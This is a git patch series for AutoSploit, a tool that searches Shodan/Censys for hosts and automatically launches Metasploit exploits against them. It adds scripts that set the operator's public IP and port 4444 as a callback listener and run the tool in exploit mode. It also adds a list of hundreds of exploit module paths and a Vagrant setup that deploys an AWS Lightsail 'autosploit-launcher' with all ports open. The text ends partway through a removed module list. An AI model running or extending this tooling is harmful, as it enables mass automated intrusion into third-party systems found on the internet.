From 680e509d0a41308f95f321403cc3777b2619e6ef Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 9 Apr 2018 11:24:58 -0400 Subject: [PATCH 1/9] Scripts to automate autosploit. ./dryrun_autosploit.sh will search censys/shodan/etc and do a dry-run against discovered hosts that are in the whitelist. VALIDATE THE DRYRUN REPORT BEFORE LAUNCHING THE ACTUAL EXPLOIT RUN ./run_autosploit.sh will run autosploit in exploit mode against previously discovered hosts in the whitelist. --- dryrun_autosploit.sh | 27 ++++ etc/json/other_modules.json | 268 ++++++++++++++++++++++++++++++++++++ run_autosploit.sh | 15 ++ 3 files changed, 310 insertions(+) create mode 100644 dryrun_autosploit.sh create mode 100644 etc/json/other_modules.json create mode 100644 run_autosploit.sh diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh new file mode 100644 index 0000000..8ab504b --- /dev/null +++ b/dryrun_autosploit.sh @@ -0,0 +1,27 @@ +#!/usr/bin/env bash + + +if [[ $# -lt 3 ]]; then + echo "Syntax:" + echo -e "\t./dryrun_autosploit.sh " +fi + +WHITELIST=$1 +SEARCH_QUERY=$2 +LPORT=4444 + +LHOST=`dig +short @resolver1.opendns.com myip.opendns.com` +TIMESTAMP=`date +%s` + + +echo "python autosploit.py -s -c -q \"${SEARCH_QUERY}\" --overwrite \ + --whitelist $WHITELIST -e \ + -C \"msf_autorun_${TIMESTAMP}\" $LHOST $LPORT \ + --exploit-file-to-use etc/json/other_modules.json \ + --dry-run" + +python autosploit.py -s -c -q "${SEARCH_QUERY}" --overwrite \ + --whitelist $WHITELIST -e \ + -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT \ + --exploit-file-to-use etc/json/other_modules.json \ + --dry-run diff --git a/etc/json/other_modules.json b/etc/json/other_modules.json new file mode 100644 index 0000000..6652a2c --- /dev/null +++ b/etc/json/other_modules.json @@ -0,0 +1,268 @@ +{ + "exploits": [ + "exploit/windows/ftp/ms09_053_ftpd_nlst", + "exploit/windows/firewall/blackice_pam_icq", + "exploit/windows/http/amlibweb_webquerydll_app", + "exploit/windows/http/ektron_xslt_exec_ws", + "exploit/windows/http/umbraco_upload_aspx", + "exploit/windows/iis/iis_webdav_scstoragepathfromurl", + "exploit/windows/iis/iis_webdav_upload_asp", + "exploit/windows/iis/ms01_023_printer", + "exploit/windows/iis/ms01_026_dbldecode", + "exploit/windows/iis/ms01_033_idq", + "exploit/windows/iis/ms02_018_htr", + "exploit/windows/iis/ms02_065_msadc", + "exploit/windows/iis/ms03_007_ntdll_webdav", + "exploit/windows/iis/msadc", + "exploit/windows/isapi/ms00_094_pbserver", + "exploit/windows/isapi/ms03_022_nsiislog_post", + "exploit/windows/isapi/ms03_051_fp30reg_chunked", + "exploit/windows/isapi/rsa_webagent_redirect", + "exploit/windows/isapi/w3who_query", + "exploit/windows/scada/advantech_webaccess_dashboard_file_upload", + "exploit/windows/ssl/ms04_011_pct", + "exploit/freebsd/http/watchguard_cmd_exec ", + "exploit/linux/http/alienvault_exec ", + "exploit/linux/http/alienvault_sqli_exec ", + "exploit/linux/http/astium_sqli_upload ", + "exploit/linux/http/centreon_sqli_exec ", + "exploit/linux/http/centreon_useralias_exec ", + "exploit/linux/http/crypttech_cryptolog_login_exec ", + "exploit/linux/http/dolibarr_cmd_exec ", + "exploit/linux/http/goautodial_3_rce_command_injection", + "exploit/linux/http/kloxo_sqli ", + "exploit/linux/http/nagios_xi_chained_rce ", + "exploit/linux/http/netgear_wnr2000_rce ", + "exploit/linux/http/pandora_fms_sqli ", + "exploit/linux/http/riverbed_netprofiler_netexpress_exe ", + "exploit/linux/http/wd_mycloud_multiupload_upload ", + "exploit/linux/http/zabbix_sqli ", + "exploit/linux/misc/qnap_transcode_server ", + "exploit/linux/mysql/mysql_yassl_getname ", + "exploit/linux/mysql/mysql_yassl_hello ", + "exploit/linux/postgres/postgres_payload ", + "exploit/linux/samba/is_known_pipename ", + "exploit/multi/browser/java_jre17_driver_manager ", + "exploit/multi/http/atutor_sqli ", + "exploit/multi/http/dexter_casinoloader_exec ", + "exploit/multi/http/drupal_drupageddon ", + "exploit/multi/http/manage_engine_dc_pmp_sqli ", + "exploit/multi/http/manageengine_search_sqli ", + "exploit/multi/http/movabletype_upgrade_exec ", + "exploit/multi/http/php_volunteer_upload_exe ", + "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli ", + "exploit/multi/http/splunk_mappy_exec ", + "exploit/multi/http/testlink_upload_exec ", + "exploit/multi/http/zpanel_information_disclosure_rce ", + "exploit/multi/misc/legend_bot_exec ", + "exploit/multi/mysql/mysql_udf_payload ", + "exploit/multi/postgres/postgres_createlang ", + "exploit/solaris/sunrpc/ypupdated_exec ", + "exploit/unix/ftp/proftpd_133c_backdoor ", + "exploit/unix/http/tnftp_savefile ", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce ", + "exploit/unix/webapp/kimai_sqli ", + "exploit/unix/webapp/openemr_sqli_privesc_upload ", + "exploit/unix/webapp/seportal_sqli_exec ", + "exploit/unix/webapp/vbulletin_vote_sqli_exec ", + "exploit/unix/webapp/vicidial_manager_send_cmd_exec", + "exploit/windows/antivirus/symantec_endpoint_manager_rce ", + "exploit/windows/http/apache_mod_rewrite_ldap ", + "exploit/windows/http/ca_totaldefense_regeneratereports", + "exploit/windows/http/cyclope_ess_sqli", + "exploit/windows/http/hp_mpa_job_acct", + "exploit/windows/http/solarwinds_storage_manager_sql", + "exploit/windows/http/sonicwall_scrutinizer_sql", + "exploit/windows/misc/altiris_ds_sqli ", + "exploit/windows/misc/fb_cnct_group ", + "exploit/windows/misc/lianja_db_net ", + "exploit/windows/misc/manageengine_eventlog_analyzer_rce ", + "exploit/windows/mssql/lyris_listmanager_weak_pass ", + "exploit/windows/mssql/ms02_039_slammer ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin ", + "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli ", + "exploit/windows/mssql/mssql_linkcrawler ", + "exploit/windows/mssql/mssql_payload ", + "exploit/windows/mssql/mssql_payload_sqli ", + "exploit/windows/mysql/mysql_mof ", + "exploit/windows/mysql/mysql_start_up ", + "exploit/windows/mysql/mysql_yassl_hello", + "exploit/windows/mysql/scrutinizer_upload_exec ", + "exploit/windows/postgres/postgres_payload ", + "exploit/windows/scada/realwin_on_fcs_login", + "exploit/multi/http/rails_actionpack_inline_exec", + "exploit/multi/http/rails_dynamic_render_code_exec", + "exploit/multi/http/rails_json_yaml_code_exec", + "exploit/multi/http/rails_secret_deserialization", + "exploit/multi/http/rails_web_console_v2_code_exec", + "exploit/multi/http/rails_xml_yaml_code_exec", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/phpmoadmin_exec", + "exploit/multi/http/phpmyadmin_3522_backdoor", + "exploit/multi/http/phpmyadmin_preg_replace", + "exploit/multi/http/phpscheduleit_start_date", + "exploit/multi/http/phptax_exec", + "exploit/multi/http/phpwiki_ploticus_exec", + "exploit/multi/http/plone_popen2", + "exploit/multi/http/pmwiki_pagelist", + "exploit/multi/http/joomla_http_header_rce", + "exploit/multi/http/novell_servicedesk_rce", + "exploit/multi/http/oracle_reports_rce", + "exploit/multi/http/php_utility_belt_rce", + "exploit/multi/http/phpfilemanager_rce", + "exploit/multi/http/processmaker_exec", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/spree_search_exec", + "exploit/multi/http/spree_searchlogic_exec", + "exploit/multi/http/struts_code_exec_parameters", + "exploit/multi/http/vtiger_install_rce", + "exploit/multi/http/werkzeug_debug_rce", + "exploit/multi/http/zemra_panel_rce", + "exploit/multi/http/zpanel_information_disclosure_rce", + "exploit/multi/http/joomla_http_header_rce", + "exploit/unix/webapp/joomla_akeeba_unserialize", + "exploit/unix/webapp/joomla_comjce_imgmanager", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce", + "exploit/unix/webapp/joomla_media_upload_exec", + "exploit/multi/http/builderengine_upload_exec", + "exploit/multi/http/caidao_php_backdoor_exec", + "exploit/multi/http/atutor_sqli ", + "exploit/multi/http/ajaxplorer_checkinstall_exec", + "exploit/multi/http/apache_activemq_upload_jsp", + "exploit/unix/webapp/wp_lastpost_exec", + "exploit/unix/webapp/wp_mobile_detector_upload_execute", + "exploit/multi/http/axis2_deployer", + "exploit/unix/webapp/wp_foxypress_upload", + "exploit/linux/http/tr064_ntpserver_cmdinject", + "exploit/linux/misc/quest_pmmasterd_bof", + "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload", + "exploit/unix/webapp/php_xmlrpc_eval", + "exploit/unix/webapp/wp_admin_shell_upload", + "exploit/linux/http/sophos_wpa_sblistpack_exec", + "exploit/linux/local/sophos_wpa_clear_keys", + "exploit/multi/http/zpanel_information_disclosure_rce", + "auxiliary/admin/cisco/cisco_asa_extrabacon", + "auxiliary/admin/cisco/cisco_secure_acs_bypass", + "auxiliary/admin/cisco/vpn_3000_ftp_bypass", + "exploit/bsdi/softcart/mercantec_softcart ", + "exploit/freebsd/misc/citrix_netscaler_soap_bof", + "exploit/freebsd/samba/trans2open", + "exploit/linux/ftp/proftp_sreplace ", + "exploit/linux/http/dcos_marathon", + "exploit/linux/http/f5_icall_cmd", + "exploit/linux/http/fritzbox_echo_exec", + "exploit/linux/http/gitlist_exec", + "exploit/linux/http/goautodial_3_rce_command_injection", + "exploit/linux/http/ipfire_bashbug_exec", + "exploit/linux/http/ipfire_oinkcode_exec", + "exploit/linux/http/ipfire_proxy_exec", + "exploit/linux/http/kaltura_unserialize_rce", + "exploit/linux/http/lifesize_uvc_ping_rce", + "exploit/linux/http/nagios_xi_chained_rce", + "exploit/linux/http/netgear_dgn1000_setup_unauth_exec", + "exploit/linux/http/netgear_wnr2000_rce ", + "exploit/linux/http/nuuo_nvrmini_auth_rce", + "exploit/linux/http/nuuo_nvrmini_unauth_rce", + "exploit/linux/http/op5_config_exec", + "exploit/linux/http/pandora_fms_exec", + "exploit/linux/http/pineapple_preconfig_cmdinject", + "exploit/linux/http/seagate_nas_php_exec_noauth", + "exploit/linux/http/symantec_messaging_gateway_exec", + "exploit/linux/http/trendmicro_imsva_widget_exec", + "exploit/linux/http/trueonline_billion_5200w_rce", + "exploit/linux/http/trueonline_p660hn_v1_rce", + "exploit/linux/http/trueonline_p660hn_v2_rce", + "exploit/linux/http/vcms_upload", + "exploit/linux/misc/lprng_format_string", + "exploit/linux/misc/mongod_native_helper", + "exploit/linux/misc/ueb9_bpserverd", + "exploit/linux/mysql/mysql_yassl_getname", + "exploit/linux/pop3/cyrus_pop3d_popsubfolders", + "exploit/linux/postgres/postgres_payload", + "exploit/linux/pptp/poptop_negative_read", + "exploit/linux/proxy/squid_ntlm_authenticate", + "exploit/linux/samba/lsa_transnames_heap", + "exploit/linux/samba/setinfopolicy_heap", + "exploit/linux/samba/trans2open", + "exploit/multi/elasticsearch/script_mvel_rce", + "exploit/multi/elasticsearch/search_groovy_script", + "exploit/multi/http/atutor_sqli", + "exploit/multi/http/axis2_deployer", + "exploit/multi/http/familycms_less_exe", + "exploit/multi/http/freenas_exec_raw", + "exploit/multi/http/gestioip_exec", + "exploit/multi/http/glassfish_deployer", + "exploit/multi/http/glpi_install_rce", + "exploit/multi/http/joomla_http_header_rce ", + "exploit/multi/http/makoserver_cmd_exec", + "exploit/multi/http/novell_servicedesk_rc", + "exploit/multi/http/oracle_reports_rce", + "exploit/multi/http/php_utility_belt_rce", + "exploit/multi/http/phpfilemanager_rce", + "exploit/multi/http/phpmyadmin_3522_backdoor", + "exploit/multi/http/phpwiki_ploticus_exec", + "exploit/multi/http/processmaker_exec", + "exploit/multi/http/rails_actionpack_inline_exec", + "exploit/multi/http/rails_dynamic_render_code_exec", + "exploit/multi/http/rails_secret_deserialization", + "exploit/multi/http/rocket_servergraph_file_requestor_rce", + "exploit/multi/http/simple_backdoors_exec", + "exploit/multi/http/spree_search_exec", + "exploit/multi/http/spree_searchlogic_exec", + "exploit/multi/http/struts2_rest_xstream", + "exploit/multi/http/struts_code_exec", + "exploit/multi/http/struts_code_exec_classloader", + "exploit/multi/http/struts_code_exec_parameters", + "exploit/multi/http/struts_dev_mode", + "exploit/multi/http/sysaid_auth_file_upload", + "exploit/multi/http/tomcat_jsp_upload_bypass", + "exploit/multi/http/vtiger_install_rce", + "exploit/multi/http/werkzeug_debug_rce", + "exploit/multi/http/zemra_panel_rce", + "exploit/multi/http/zpanel_information_disclosure_rce", + "exploit/multi/ids/snort_dce_rpc", + "exploit/multi/misc/batik_svg_java", + "exploit/multi/misc/pbot_exec", + "exploit/multi/misc/veritas_netbackup_cmdexec", + "exploit/multi/mysql/mysql_udf_payload", + "exploit/multi/php/php_unserialize_zval_cookie", + "exploit/unix/http/freepbx_callmenum", + "exploit/unix/http/lifesize_room", + "exploit/unix/http/pfsense_clickjacking", + "exploit/unix/http/pfsense_group_member_exec", + "exploit/unix/http/tnftp_savefile", + "exploit/unix/misc/polycom_hdx_traceroute_exec", + "exploit/unix/webapp/awstats_migrate_exec", + "exploit/unix/webapp/carberp_backdoor_exec", + "exploit/unix/webapp/citrix_access_gateway_exec", + "exploit/unix/webapp/dogfood_spell_exec", + "exploit/unix/webapp/invision_pboard_unserialize_exec", + "exploit/unix/webapp/joomla_contenthistory_sqli_rce", + "exploit/unix/webapp/mybb_backdoor", + "exploit/unix/webapp/opensis_modname_exec", + "exploit/unix/webapp/oscommerce_filemanager", + "exploit/unix/webapp/piwik_superuser_plugin_upload", + "exploit/unix/webapp/tikiwiki_upload_exec", + "exploit/unix/webapp/webtester_exec", + "exploit/unix/webapp/wp_phpmailer_host_header", + "exploit/unix/webapp/wp_total_cache_exec", + "exploit/windows/antivirus/symantec_endpoint_manager_rce", + "exploit/windows/http/ektron_xslt_exec", + "exploit/windows/http/ektron_xslt_exec_ws", + "exploit/windows/http/geutebrueck_gcore_x64_rce_bo", + "exploit/windows/http/hp_autopass_license_traversal", + "exploit/windows/http/manage_engine_opmanager_rce", + "exploit/windows/http/netgear_nms_rce", + "exploit/windows/http/sepm_auth_bypass_rce", + "exploit/windows/http/trendmicro_officescan_widget_exec", + "exploit/windows/iis/iis_webdav_upload_asp", + "exploit/windows/iis/msadc", + "exploit/windows/misc/manageengine_eventlog_analyzer_rce", + "exploit/windows/novell/file_reporter_fsfui_upload", + "exploit/windows/scada/ge_proficy_cimplicity_gefebt", + "exploit/windows/smb/ipass_pipe_exec", + "exploit/windows/smb/smb_relay", + "auxiliary/sqli/oracle/jvm_os_code_10g", + "auxiliary/sqli/oracle/jvm_os_code_11g" + ] +} diff --git a/run_autosploit.sh b/run_autosploit.sh new file mode 100644 index 0000000..62d0e2b --- /dev/null +++ b/run_autosploit.sh @@ -0,0 +1,15 @@ +#!/usr/bin/env bash + + +if [[ $# -lt 3 ]]; then + echo "Syntax:" + echo -e "\t./run_autosploit.sh " +fi + +WHITELIST=$1 +LPORT=$3 + +LHOST=`dig +short @resolver1.opendns.com myip.opendns.com` +TIMESTAMP=`date +%s` + +python autosploit.py --whitelist $WHITELIST -e -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT -f etc/json/other_modules.json From 99c208f3f2ae8cd72e96965b1aa4171d6586b105 Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 9 Apr 2018 11:47:48 -0400 Subject: [PATCH 2/9] Added a vagrant config to easily deploy autosploit to aws-lightsail. COMES WITHOUT WARRANTY. Use as a starting point. Tweaks to make it usable for dev: - Setup a synced folder with your autosploit dev in the Vagrantfile Refer to vagrant doc. - Use vagrant rsync-auto Since vagrant file cannot really be shared as-is, some tweakings might be necessary. Try: -Modifying the Vagrantfile according to your ssh keys path -Installing the aws-cli pacakge -Configuring ~/.aws directory --- Vagrant/Vagrantfile | 28 ++++++++++++++++++++++++++++ Vagrant/bootstrap/bootstrap.sh | 20 ++++++++++++++++++++ 2 files changed, 48 insertions(+) create mode 100644 Vagrant/Vagrantfile create mode 100644 Vagrant/bootstrap/bootstrap.sh diff --git a/Vagrant/Vagrantfile b/Vagrant/Vagrantfile new file mode 100644 index 0000000..c427e3a --- /dev/null +++ b/Vagrant/Vagrantfile @@ -0,0 +1,28 @@ +# Use as a strating point to spin up a box in lightsail. +# the vagrant-lightsail plugin is required +# You probably also need to: +# - Configure the ssh keys path +# - Install and configure the aws-cli package + +Vagrant.configure('2') do |config| + config.vm.synced_folder ".", "/vagrant", type: "rsync", + rsync__exclude: ".git/", + rsync__auto: true + + config.ssh.private_key_path = '/path/to/id_rsa' + config.ssh.username = 'ubuntu' + config.vm.box = 'lightsail' + config.vm.box_url = 'https://github.com/thejandroman/vagrant-lightsail/raw/master/box/lightsail.box' + config.vm.hostname = 'autosploit-launcher' + + config.vm.provider :lightsail do |provider, override| + provider.port_info = [{ from_port: 0, to_port: 65535, protocol: + 'all' }] + provider.keypair_name = 'id_rsa' + provider.bundle_id = 'small_1_0' + end + + config.vm.provision "bootstrap", type: "shell", run: "once" do |s| + s.path = "./bootstrap/bootstrap.sh" + end +end diff --git a/Vagrant/bootstrap/bootstrap.sh b/Vagrant/bootstrap/bootstrap.sh new file mode 100644 index 0000000..5f0a31a --- /dev/null +++ b/Vagrant/bootstrap/bootstrap.sh @@ -0,0 +1,20 @@ +#!/usr/bin/env bash + + +echo "Yolosploit configurator 2.42" +sudo apt-get --yes update +sudo apt-get --yes upgrade + +echo "Installing metasploit. BE PATIENT (5 min max?)" +wget --quiet https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run +chmod +x metasploit-latest-linux-x64-installer.run +sudo ./metasploit-latest-linux-x64-installer.run --unattendedmodeui none --prefix /opt/msf --mode unattended + +echo "Installing pyhton2" +sudo apt-get --yes install python python-pip python-virtualenv git + +sudo apt-get --yes install fish +sudo chsh -s /usr/bin/fish ubuntu + +cd ~ +git clone https://github.com/NullArray/AutoSploit From 1bac9940aea51dbc1d8c7ba6e0ddbb63b7a96a03 Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 9 Apr 2018 12:19:40 -0400 Subject: [PATCH 3/9] Fixed bash script args --- dryrun_autosploit.sh | 2 +- run_autosploit.sh | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh index 8ab504b..f0282a3 100644 --- a/dryrun_autosploit.sh +++ b/dryrun_autosploit.sh @@ -1,7 +1,7 @@ #!/usr/bin/env bash -if [[ $# -lt 3 ]]; then +if [[ $# -lt 2 ]]; then echo "Syntax:" echo -e "\t./dryrun_autosploit.sh " fi diff --git a/run_autosploit.sh b/run_autosploit.sh index 62d0e2b..98ae47d 100644 --- a/run_autosploit.sh +++ b/run_autosploit.sh @@ -1,13 +1,13 @@ #!/usr/bin/env bash -if [[ $# -lt 3 ]]; then +if [[ $# -lt 2 ]]; then echo "Syntax:" echo -e "\t./run_autosploit.sh " fi WHITELIST=$1 -LPORT=$3 +LPORT=$2 LHOST=`dig +short @resolver1.opendns.com myip.opendns.com` TIMESTAMP=`date +%s` From db0db7f69ed2405d1ef5419a93e3f75b5d0bd9d4 Mon Sep 17 00:00:00 2001 From: selora Date: Mon, 9 Apr 2018 13:04:32 -0400 Subject: [PATCH 4/9] Removed blocking MSF modules from default module list --- dryrun_autosploit.sh | 4 +- etc/json/default_modules.json | 23 +-- etc/json/other_modules.json | 268 ---------------------------------- run_autosploit.sh | 3 +- 4 files changed, 5 insertions(+), 293 deletions(-) delete mode 100644 etc/json/other_modules.json diff --git a/dryrun_autosploit.sh b/dryrun_autosploit.sh index f0282a3..137d5a2 100644 --- a/dryrun_autosploit.sh +++ b/dryrun_autosploit.sh @@ -17,11 +17,11 @@ TIMESTAMP=`date +%s` echo "python autosploit.py -s -c -q \"${SEARCH_QUERY}\" --overwrite \ --whitelist $WHITELIST -e \ -C \"msf_autorun_${TIMESTAMP}\" $LHOST $LPORT \ - --exploit-file-to-use etc/json/other_modules.json \ + --exploit-file-to-use etc/json/default_modules.json \ --dry-run" python autosploit.py -s -c -q "${SEARCH_QUERY}" --overwrite \ --whitelist $WHITELIST -e \ -C "msf_autorun_${TIMESTAMP}" $LHOST $LPORT \ - --exploit-file-to-use etc/json/other_modules.json \ + --exploit-file-to-use etc/json/default_modules.json \ --dry-run diff --git a/etc/json/default_modules.json b/etc/json/default_modules.json index f30a51b..f0e5a65 100644 --- a/etc/json/default_modules.json +++ b/etc/json/default_modules.json @@ -263,27 +263,6 @@ "exploit/windows/smb/ipass_pipe_exec", "exploit/windows/smb/smb_relay", "auxiliary/sqli/oracle/jvm_os_code_10g", - "auxiliary/sqli/oracle/jvm_os_code_11g", - "auxiliary/fuzzers/dns/dns_fuzzer", - "auxiliary/fuzzers/ftp/client_ftp", - "auxiliary/fuzzers/ftp/ftp_pre_post", - "auxiliary/fuzzers/http/http_form_field", - "auxiliary/fuzzers/http/http_get_uri_long", - "auxiliary/fuzzers/http/http_get_uri_strings", - "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer", - "auxiliary/fuzzers/smb/smb2_negotiate_corrupt", - "auxiliary/fuzzers/smb/smb_create_pipe", - "auxiliary/fuzzers/smb/smb_create_pipe_corrupt", - "auxiliary/fuzzers/smb/smb_negotiate_corrupt ", - "auxiliary/fuzzers/smb/smb_ntlm1_login_corrupt", - "auxiliary/fuzzers/smb/smb_tree_connect", - "auxiliary/fuzzers/smb/smb_tree_connect_corrupt", - "auxiliary/fuzzers/smtp/smtp_fuzzer", - "auxiliary/fuzzers/ssh/ssh_kexinit_corrupt", - "auxiliary/fuzzers/ssh/ssh_version_15", - "auxiliary/fuzzers/ssh/ssh_version_2", - "auxiliary/fuzzers/ssh/ssh_version_corrupt", - "auxiliary/fuzzers/tds/tds_login_corrupt", - "auxiliary/fuzzers/tds/tds_login_username" + "auxiliary/sqli/oracle/jvm_os_code_11g" ] } diff --git a/etc/json/other_modules.json b/etc/json/other_modules.json deleted file mode 100644 index 6652a2c..0000000 --- a/etc/json/other_modules.json +++ /dev/null @@ -1,268 +0,0 @@ -{ - "exploits": [ - "exploit/windows/ftp/ms09_053_ftpd_nlst", - "exploit/windows/firewall/blackice_pam_icq", - "exploit/windows/http/amlibweb_webquerydll_app", - "exploit/windows/http/ektron_xslt_exec_ws", - "exploit/windows/http/umbraco_upload_aspx", - "exploit/windows/iis/iis_webdav_scstoragepathfromurl", - "exploit/windows/iis/iis_webdav_upload_asp", - "exploit/windows/iis/ms01_023_printer", - "exploit/windows/iis/ms01_026_dbldecode", - "exploit/windows/iis/ms01_033_idq", - "exploit/windows/iis/ms02_018_htr", - "exploit/windows/iis/ms02_065_msadc", - "exploit/windows/iis/ms03_007_ntdll_webdav", - "exploit/windows/iis/msadc", - "exploit/windows/isapi/ms00_094_pbserver", - "exploit/windows/isapi/ms03_022_nsiislog_post", - "exploit/windows/isapi/ms03_051_fp30reg_chunked", - "exploit/windows/isapi/rsa_webagent_redirect", - "exploit/windows/isapi/w3who_query", - "exploit/windows/scada/advantech_webaccess_dashboard_file_upload", - "exploit/windows/ssl/ms04_011_pct", - "exploit/freebsd/http/watchguard_cmd_exec ", - "exploit/linux/http/alienvault_exec ", - "exploit/linux/http/alienvault_sqli_exec ", - "exploit/linux/http/astium_sqli_upload ", - "exploit/linux/http/centreon_sqli_exec ", - "exploit/linux/http/centreon_useralias_exec ", - "exploit/linux/http/crypttech_cryptolog_login_exec ", - "exploit/linux/http/dolibarr_cmd_exec ", - "exploit/linux/http/goautodial_3_rce_command_injection", - "exploit/linux/http/kloxo_sqli ", - "exploit/linux/http/nagios_xi_chained_rce ", - "exploit/linux/http/netgear_wnr2000_rce ", - "exploit/linux/http/pandora_fms_sqli ", - "exploit/linux/http/riverbed_netprofiler_netexpress_exe ", - "exploit/linux/http/wd_mycloud_multiupload_upload ", - "exploit/linux/http/zabbix_sqli ", - "exploit/linux/misc/qnap_transcode_server ", - "exploit/linux/mysql/mysql_yassl_getname ", - "exploit/linux/mysql/mysql_yassl_hello ", - "exploit/linux/postgres/postgres_payload ", - "exploit/linux/samba/is_known_pipename ", - "exploit/multi/browser/java_jre17_driver_manager ", - "exploit/multi/http/atutor_sqli ", - "exploit/multi/http/dexter_casinoloader_exec ", - "exploit/multi/http/drupal_drupageddon ", - "exploit/multi/http/manage_engine_dc_pmp_sqli ", - "exploit/multi/http/manageengine_search_sqli ", - "exploit/multi/http/movabletype_upgrade_exec ", - "exploit/multi/http/php_volunteer_upload_exe ", - "exploit/multi/http/sonicwall_scrutinizer_methoddetail_sqli ", - "exploit/multi/http/splunk_mappy_exec ", - "exploit/multi/http/testlink_upload_exec ", - "exploit/multi/http/zpanel_information_disclosure_rce ", - "exploit/multi/misc/legend_bot_exec ", - "exploit/multi/mysql/mysql_udf_payload ", - "exploit/multi/postgres/postgres_createlang ", - "exploit/solaris/sunrpc/ypupdated_exec ", - "exploit/unix/ftp/proftpd_133c_backdoor ", - "exploit/unix/http/tnftp_savefile ", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce ", - "exploit/unix/webapp/kimai_sqli ", - "exploit/unix/webapp/openemr_sqli_privesc_upload ", - "exploit/unix/webapp/seportal_sqli_exec ", - "exploit/unix/webapp/vbulletin_vote_sqli_exec ", - "exploit/unix/webapp/vicidial_manager_send_cmd_exec", - "exploit/windows/antivirus/symantec_endpoint_manager_rce ", - "exploit/windows/http/apache_mod_rewrite_ldap ", - "exploit/windows/http/ca_totaldefense_regeneratereports", - "exploit/windows/http/cyclope_ess_sqli", - "exploit/windows/http/hp_mpa_job_acct", - "exploit/windows/http/solarwinds_storage_manager_sql", - "exploit/windows/http/sonicwall_scrutinizer_sql", - "exploit/windows/misc/altiris_ds_sqli ", - "exploit/windows/misc/fb_cnct_group ", - "exploit/windows/misc/lianja_db_net ", - "exploit/windows/misc/manageengine_eventlog_analyzer_rce ", - "exploit/windows/mssql/lyris_listmanager_weak_pass ", - "exploit/windows/mssql/ms02_039_slammer ", - "exploit/windows/mssql/ms09_004_sp_replwritetovarbin ", - "exploit/windows/mssql/ms09_004_sp_replwritetovarbin_sqli ", - "exploit/windows/mssql/mssql_linkcrawler ", - "exploit/windows/mssql/mssql_payload ", - "exploit/windows/mssql/mssql_payload_sqli ", - "exploit/windows/mysql/mysql_mof ", - "exploit/windows/mysql/mysql_start_up ", - "exploit/windows/mysql/mysql_yassl_hello", - "exploit/windows/mysql/scrutinizer_upload_exec ", - "exploit/windows/postgres/postgres_payload ", - "exploit/windows/scada/realwin_on_fcs_login", - "exploit/multi/http/rails_actionpack_inline_exec", - "exploit/multi/http/rails_dynamic_render_code_exec", - "exploit/multi/http/rails_json_yaml_code_exec", - "exploit/multi/http/rails_secret_deserialization", - "exploit/multi/http/rails_web_console_v2_code_exec", - "exploit/multi/http/rails_xml_yaml_code_exec", - "exploit/multi/http/rocket_servergraph_file_requestor_rce", - "exploit/multi/http/phpmoadmin_exec", - "exploit/multi/http/phpmyadmin_3522_backdoor", - "exploit/multi/http/phpmyadmin_preg_replace", - "exploit/multi/http/phpscheduleit_start_date", - "exploit/multi/http/phptax_exec", - "exploit/multi/http/phpwiki_ploticus_exec", - "exploit/multi/http/plone_popen2", - "exploit/multi/http/pmwiki_pagelist", - "exploit/multi/http/joomla_http_header_rce", - "exploit/multi/http/novell_servicedesk_rce", - "exploit/multi/http/oracle_reports_rce", - "exploit/multi/http/php_utility_belt_rce", - "exploit/multi/http/phpfilemanager_rce", - "exploit/multi/http/processmaker_exec", - "exploit/multi/http/rocket_servergraph_file_requestor_rce", - "exploit/multi/http/spree_search_exec", - "exploit/multi/http/spree_searchlogic_exec", - "exploit/multi/http/struts_code_exec_parameters", - "exploit/multi/http/vtiger_install_rce", - "exploit/multi/http/werkzeug_debug_rce", - "exploit/multi/http/zemra_panel_rce", - "exploit/multi/http/zpanel_information_disclosure_rce", - "exploit/multi/http/joomla_http_header_rce", - "exploit/unix/webapp/joomla_akeeba_unserialize", - "exploit/unix/webapp/joomla_comjce_imgmanager", - "exploit/unix/webapp/joomla_contenthistory_sqli_rce", - "exploit/unix/webapp/joomla_media_upload_exec", - "exploit/multi/http/builderengine_upload_exec", - "exploit/multi/http/caidao_php_backdoor_exec", - "exploit/multi/http/atutor_sqli ", - "exploit/multi/http/ajaxplorer_checkinstall_exec", - "exploit/multi/http/apache_activemq_upload_jsp", - "exploit/unix/webapp/wp_lastpost_exec", - "exploit/unix/webapp/wp_mobile_detector_upload_execute", - "exploit/multi/http/axis2_deployer", - "exploit/unix/webapp/wp_foxypress_upload", - "exploit/linux/http/tr064_ntpserver_cmdinject", - "exploit/linux/misc/quest_pmmasterd_bof", - "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload", - "exploit/unix/webapp/php_xmlrpc_eval", - "exploit/unix/webapp/wp_admin_shell_upload", - "exploit/linux/http/sophos_wpa_sblistpack_exec", - "exploit/linux/local/sophos_wpa_clear_keys", - "exploit/multi/http/zpanel_information_disclosure_rce", - "auxiliary/admin/cisco/cisco_asa_extrabacon", - "auxiliary/admin/cisco/cisco_secure_acs_bypass", - "auxiliary/admin/cisco/vpn_3000_ftp_bypass", - "exploit/bsdi/softcart/mercantec_softcart ", - "exploit/freebsd/misc/citrix_netscaler_soap_bof", - "exploit/freebsd/samba/trans2open", - "exploit/linux/ftp/proftp_sreplace ", - "exploit/linux/http/dcos_marathon", - "exploit/linux/http/f5_icall_cmd", - "exploit/linux/http/fritzbox_echo_exec", - "exploit/linux/http/gitlist_exec", - "exploit/linux/http/goautodial_3_rce_command_injection", - "exploit/linux/http/ipfire_bashbug_exec", - "exploit/linux/http/ipfire_oinkcode_exec", - "exploit/linux/http/ipfire_proxy_exec", - "exploit/linux/http/kaltura_unserialize_rce", - "exploit/linux/http/lifesize_uvc_ping_rce", - 